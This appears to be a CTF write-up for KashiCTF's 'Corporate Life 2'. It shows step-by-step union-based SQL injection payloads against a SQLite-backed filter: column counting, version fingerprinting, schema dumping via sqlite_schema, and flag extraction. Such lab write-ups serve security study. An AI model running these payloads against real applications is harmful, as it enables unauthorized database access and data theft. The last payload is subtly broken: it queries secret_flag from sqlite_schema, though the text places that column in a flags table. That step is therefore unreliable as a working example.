KashiCTF

Corporate Life 2 [261 pts]

Challenge Description

Points: 261

Solves: 117

• union SQLi to retrieve hidden table name, columns and finally contents

---

This challenge has the same setup as the previous one (Corporate life 1), we just have to find the flag elsewhere, since ' OR 1=1 -- still works but the flag is not there. Lets try union injection, the first step is figuring out how many fields are returned by the original query. Since the table lists 6 elements per user, lets return 6 nulls:

{
	"filter":"' union select null, null, null, null, null, null  --"
}

It works fine, next we need to find what database is this … I tried enumerating version and the payload for sqlite worked

{
	"filter":"' union select sqlite_version(), null, null, null, null, null --"
}

Now we would like to enumerate, what tables are there in the database, we can use group_concat for that purpose, combined with sql column name we can see tables as well as their columns

{
	"filter":"' union select group_concat(sql, ' | '), null, null, null, null, null from sqlite_schema --"
}

There is a flags table with column secret_flag, let’s get the flag

{
	"filter":"' union select group_concat(secret_flag, ' | '), null, null, null, null, null from sqlite_schema --"
}

which returns new entry with flag KashiCTF{b0r1ng_old_c0rp0_l1f3_am_1_r1gh7_elzjMs6d}